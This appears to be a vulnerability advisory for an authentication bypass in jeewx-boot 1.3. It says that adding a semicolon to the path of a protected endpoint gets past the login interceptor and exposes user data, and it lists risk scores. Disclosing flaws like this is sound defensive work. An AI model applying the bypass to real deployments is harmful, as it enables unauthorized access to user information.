Primary

Context

jeewx-boot Authentication Bypass Vulnerability in Login Interceptor

Vulnerability

An authentication bypass vulnerability has been identified in jeewx-boot version 1.3. The issue arises in the LoginInterceptor class, specifically within the preHandle function. The vulnerability allows attackers to access certain API endpoints without a valid authentication token by exploiting how request paths are processed.

Impact

Exploitation of this vulnerability allows unauthorized access to protected API endpoints, potentially leading to unauthorized data access or manipulation.

Reproduction

To reproduce this vulnerability, send a request to the '/system/back/jwSystemUser/list.do' endpoint without an authentication token. The request will be redirected to the login page. However, if the request path is modified to include a semicolon, the authentication check can be bypassed, allowing access to user information without a token.

Added: Aug 20, 2025, 5:38 PM

Updated: Aug 20, 2025, 5:38 PM

Vulnerability Rating

Custom Algorithm

spread

0.0

impact

5.0

exploitability

8.7

remediation

0.0

relevance

0.4

threat

6.4

urgency

2.9

incentive

5.8

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

0.0

impact

5.0

exploitability

8.7

remediation

0.0

relevance

0.4

threat

6.4

urgency

2.9

incentive

5.8

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

jeewx-boot Authentication Bypass Vulnerability in Login Interceptor

Vulnerability

Impact

Reproduction

Affected Products

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating